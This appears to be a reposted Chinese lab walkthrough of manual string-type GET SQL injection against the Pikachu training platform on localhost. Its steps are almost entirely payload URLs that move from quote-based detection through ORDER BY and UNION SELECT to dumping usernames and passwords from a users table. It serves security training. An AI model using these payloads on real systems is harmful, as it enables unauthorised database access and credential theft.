pikachu-字符型注入(get) #手工注入

Posted hunter-01001100

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了pikachu-字符型注入(get) #手工注入相关的知识,希望对你有一定的参考价值。

1.检测注入类型

http://127.0.0.1/pikachu-master/vul/sqli/sqli_str.php?name=1&submit=%E6%9F%A5%E8%AF%A2    #不报错
http://127.0.0.1/pikachu-master/vul/sqli/sqli_str.php?name=1‘&submit=%E6%9F%A5%E8%AF%A2    #报错
http://127.0.0.1/pikachu-master/vul/sqli/sqli_str.php?name=1‘--+&submit=%E6%9F%A5%E8%AF%A2    #不报错

 2.判断字段数

http://127.0.0.1/pikachu-master/vul/sqli/sqli_str.php?name=1‘order by 2--+&submit=%E6%9F%A5%E8%AF%A2

3.暴库

http://127.0.0.1/pikachu-master/vul/sqli/sqli_str.php?name=1‘UNION SELECT 1,2--+&submit=%E6%9F%A5%E8%AF%A2

4.查数据库

http://127.0.0.1/pikachu-master/vul/sqli/sqli_str.php?name=1‘UNION SELECT 1,database()--+&submit=%E6%9F%A5%E8%AF%A2

5.查表

http://127.0.0.1/pikachu-master/vul/sqli/sqli_str.php?name=1′ UNION SELECT 1,group_concat(table_name) from information_schema.tables where table_schema=database() --+&submit=%E6%9F%A5%E8%AF%A2

6.查列

http://127.0.0.1/pikachu-master/vul/sqli/sqli_str.php?name=1′ UNION SELECT 1,group_concat(column_name) from information_schema.columns where table_name=‘users‘ --+&submit=%E6%9F%A5%E8%AF%A2

7.查字段内容

http://127.0.0.1/pikachu-master/vul/sqli/sqli_str.php?name=1′ UNION SELECT 1,group_concat(id,username,password) from users --+&submit=%E6%9F%A5%E8%AF%A2

 

#sql语句和post中的数字型注入相同

以上是关于pikachu-字符型注入(get) #手工注入的主要内容,如果未能解决你的问题,请参考以下文章

pikachu的sql注入

pikachu-xx型注入

pikachu 漏洞平台sql注入 之 字符型注入

web实验三——pikachu之sql注入

pikachu漏洞练习之sql注入

(手工)sqli-labs4041堆叠注入盲注